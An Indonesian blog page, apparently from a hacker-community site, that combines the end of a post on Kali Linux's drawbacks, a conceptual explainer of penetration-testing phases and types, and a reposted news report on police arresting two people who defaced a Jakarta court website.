- Program yang ada di windows tidak akan dapat berjalan di Sistem Operasi Kali Linux.
- Tidak semu distro inux dapat bekerja dengan semua perangkat keras komputer.
- Dalam hal penggunaannya sangat sedikit sekali user yang menggunakan OS Kali Linux kare program yang dapat dijalankan di dalam Os ini sangat sedikit.
- Tidak dapat membuka file yang berextensi .exe

Sebelum memakai Os Kali Linux sebaiknya anda belajar dahulu tentang hal yang diperlukan untuk menggunakan Os Kali Linux Ini.


MUNGKIN ITU SAJA INFO YANG BISA SAYA BERIKAN KURANG LEBIH NYA MOHON MAAF, JIKA ADA KEKURANGAN BISA COMMENT DI KOLOM KOMENTAR :D
SEE YOU MINA ~ Thx to My Team 22XploiterCrew


Apa itu Penetration Testing ?




Halo selamat malam/pagi/siang/sore :v para Hacker :v .. Setelah kemarin akhirnya selesai pasang Kali Linux, saya menjadi penasaran mengenai Sistem Operasi yang dikhususkan untuk pentest ini. Tetapi sebelumnya mungkin ada yang belum mengenal istilah pentest. Apa itu pentest ? Saya akan mencoba menjelaskan beberapa hal mengenai pentest.
1. Apa itu Penetration Testing ?
Penetration Testing (disingkat pentest) adalah suatu kegiatan dimana seseorang mencoba mensimulasikan serangan yang bisa dilakukan terhadap jaringan organisasi / perusahaan tertentu untuk menemukan kelemahan yang ada pada sistem jaringan tersebut. Orang yang melakukan kegiatan ini disebut penetration tester (disingkat pentester). Penetration Testing mempunyai standar resmi sebagai acuan dalam pelaksanaannya. Standar ini bisa dilihat di pentest-standard.org.
2. Kenapa Penetration Testing diperlukan ?
Nah kenapa kegiatan pentest diperlukan ? Perusahaan-perusahaan besar yang menyimpan data-data sensitif (seperti Bank) tentu tidak ingin jaringannya dibobol oleh orang tidak bertanggung jawab yang kemudian bisa mengambil alih kontrol jaringan dan menimbulkan kerugian yang sangat besar. Oleh karena alasan itu perusahaan menginvestasikan dana untuk memperkuat sistem jaringannya. Salah satu metode paling efektif adalah melakukan pentest. Dengan melakukan pentest, celah-celah keamanan yang ada dapat diketahui dan dengan demikian dapat diperbaiki secepatnya. Seorang pentester mensimulasikan serangan yang dapat dilakukan, menjelaskan resiko yang bisa terjadi, dan melakukan perbaikan sistem tanpa merusak infrastruktur jaringan perusahaan tersebut.
3. Tahapan Penetration Testing
Penetration Testing memiliki standar (PTES) yang digunakan sebagai acuan dalam pelaksanaanya yang dibagi ke dalam beberapa tahap :
  • Pre-engagement Interactions
Tahap dimana seorang pentester menjelaskan kegiatan pentest yang akan dilakukan kepada client (perusahaan). Disini seorang pentester harus bisa menjelaskan kegiatan-kegiatan yang akan dilakukan dan tujuan akhir yang akan dicapai.
  • Intelligence Gathering
Tahap dimana seorang pentester berusaha mengumpulkan sebanyak mungkin informasi mengenai perusahaan target yang bisa didapatkan dengan berbagai metode dan berbagai media. Hal yang perlu dijadikan dasar dalam pengumpulan informasi adalah : karakteristik sistem jaringan, cara kerja sistem jaringan, dan metode serangan yang bisa digunakan.
  • Threat Modeling
Tahap dimana seorang pentester mencari celah keamanan (vulnerabilities) berdasarkan informasi yang berhasil dikumpulkan pada tahap sebelumnya. Pada tahap ini seorang pentester tidak hanya mencari celah keamanan, tetapi juga menentukan celah yang paling efektif untuk digunakan.
  • Vulnerability Analysis
Tahap dimana seorang pentester mengkombinasikan informasi mengenai celah keamanan yang ada dengan metode serangan yang bisa dilakukan untuk melakukan serangan yang paling efektif.
  • Exploitation
Tahap dimana seorang pentester melakukan serangan pada target. Walaupun demikian tahap ini kebanyakan dilakukan dengan metode brute force tanpa memiliki unsur presisi. Seorang pentester profesional hanya akan melakukan exploitation ketika dia sudah mengetahui secara pasti apakah serangan yang dilakukan akan berhasil atau tidak. Namun tentu saja ada kemungkinan tidak terduga dalam sistem keamanan target. Walaupun begitu, sebelum melakukan serangan, pentester harus tahu kalau target mempunyai celah keamanan yang bisa digunakan. Melakukan serangan secara membabi-buta dan berharap sukses bukanlah metode yang produktif. Seorang pentester profesional selalu menyempurnakan analisisnya terlebih dahulu sebelum melakukan serangan yang efektif.
  • Post Exploitation
Tahap dimana seorang pentester berhasil masuk ke dalam sistem jaringan target dan kemudian melakukan analisis infrastruktur yang ada. Pada tahap ini seorang pentester mempelajari bagian-bagian di dalam sistem dan menentukan bagian yang paling critical bagi target (perusahaan). Disini seorang pentester harus bisa menghubungkan semua bagian-bagian sistem yang ada untuk menjelaskan dampak serangan / kerugian yang paling besar yang bisa terjadi pada target (perusahaan).
  • Reporting
Reporting adalah bagian paling penting dalam kegiatan pentest. Seorang pentester menggunakan report (laporan) untuk menjelaskan pada perusahaan mengenai pentesting yang dilakukan seperti : apa yang dilakukan, bagaimana cara melakukannya, resiko yang bisa terjadi dan yang paling utama adalah cara untuk memperbaiki sistemnya.
4. Tipe Penetration Testing
Ada dua jenis tipe pentest, yaitu : overt dan covertOvert pentest dilakukan dengan sepengetahuan perusahaan. Covert pentest dilakukan tanpa sepengetahuan perusahaan. Kedua tipe pentest ini memiliki kelebihan dan kelemahan satu sama lain.
  • Overt Penetration Testing
Pada overt pentest, seorang pentester bekerja bersama dengan tim IT perusahaan untuk mencari sebanyak mungkin celah keamanan yang ada. Salah satu kelebihannya adalah pentester mengetahui informasi sistem jaringan yang ada secara detail dan dapat melakukan serangan tanpa khawatir akan di-blok. Salah satu kelemahannya adalah tidak bisa menguji respon dari tim IT perusahaan jika terjadi serangan sebenarnya. Saat jumlah waktu dalam kegiatan pentest dibatasi, akan lebih efektif menggunakan tipe overt.
  • Covert Penetration Testing
Pada covert pentest, seorang pentester melakukan kegiatan pentest tanpa sepengetahuan perusahaan. Artinya tes ini digunakan untuk menguji respon dari tim IT perusahaan jika terjadi serangan sebenarnya. Covert test membutuhkan waktu yang lebih lama dan skill yang lebih besar daripada overt test. Kebanyakan pentester profesional lebih merekomendasikan covert test daripada overt test karena benar-benar mensimulasikan serangan yang bisa terjadi. Pada covert test, seorang pentester tidak akan berusaha mencari sebanyak mungkin celah keamanan, tetapi hanya akan mencari jalan termudah untuk masuk ke dalam sistem, tanpa terdeteksi.
Nah kira-kira seperti itulah kegiatan pentesting. Dengan semakin berkembangnya teknologi, unsur keamanan menjadi poin penting yang harus diperhatikan. Semakin sensitif data yang dimiliki perusahaan, maka akan semakin kuat juga sistem keamanan yang harus digunakan. Jika ada yang berminat untuk menjadi seorang pentester, maka kemampuan teknis networking dan programming, sangatlah diperlukan. Selain itu kita harus mempunyai analisis yang kuat untuk bisa mencari kelemahan sistem. Mungkin terlihat sangat sulit untuk menjadi seorang pentester, tetapi seperti quote terkenal : no pain no gain” 🙂

SOUCE : KLIK KER

Polisi Membekuk 2 Peretas Situs PN Jakarta Pusat




TANGERANG, apostlemusiliministries.com-Petugas Direktorat Tindak Pidana Siber Bareskrim Polri menangkap CA dan AY, tersangka peretas atau deface (mengubah tampilan) situs Pengadilan Negeri Jakarta Pusat dengan alamat http://sipp.pn-jakartapusat.go.id/.

CA (24) ditangkap di daerah Kebagusan, Jakarta Selatan, Rabu (8/1/2020).

Sementara itu, AY (22) yang dikenal dengan nama "Konslet" diamankan di daerah Pramuka, Jakarta Pusat, Kamis (9/1/2020).

"Tersangka CA menggunakan laptop Asus milik tersangka AY dan jaringan WiFi setempat untuk melakukan aksinya tersebut," ujar Kasubdit I Direktorat Tindak Pidana Siber Bareskrim Polri Kombes Reinhard Hutagaol saat konferensi pers di Gedung Humas Mabes Polri, Jakarta Selatan, Senin (13/1/2020).

Reinhard mengatakan, tersangka AY awalnya menghubungi CA melalui media sosial terkait peretasan tersebut.
Tersangka AY tidak dapat menemukan titik lemah situs PN Jakpus sehingga meminta CA meretasnya. Setelah itu, AY mengubah tampilan situs tersebut.

"Aksi peretasan tersebut dilakukan sesuai permintaan tersangka AY kepada tersangka CA, sehingga tersangka AY dapat mengubah tampilan sesuai keinginannya," ujar dia.

Setelah peretasan dilakukan, AY memberi uang Rp 400.000 kepada CA.

Berdasarkan keterangan polisi, kedua pelaku belajar keahlian tersebut secara otodidak.

CA yang merupakan lulusan sekolah dasar ini merupakan pendiri komunitas Typical Idiot Security. Menurut polisi, ia telah meretas 3.896 situs sejak dua tahun lalu.

Kemudian, AY telah meretas 352 situs. Pendidikan terakhirnya di tingkat SMP.

Dari kedua pelaku, polisi menyita dua buah laptop, dua buah telepon genggam, 12 sim card, dan sebuah kartu identitas.

Para tersangka disangkakan Pasal 46 Ayat (1), (2), dan (3) jo Pasal 30 Ayat (1), (2) dan (3), Pasal 48 Ayat (1) jo Pasal 32 Ayat (1), (2), dan Pasal 49 Jo Pasal 33 Undang-Undang Nomor 19 Tahun 2016 tentang Perubahan Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan Transaksi Elektronik.


Para pelaku terancam hukuman maksimal 10 tahun penjara.

Sumber?KOMPAS.COM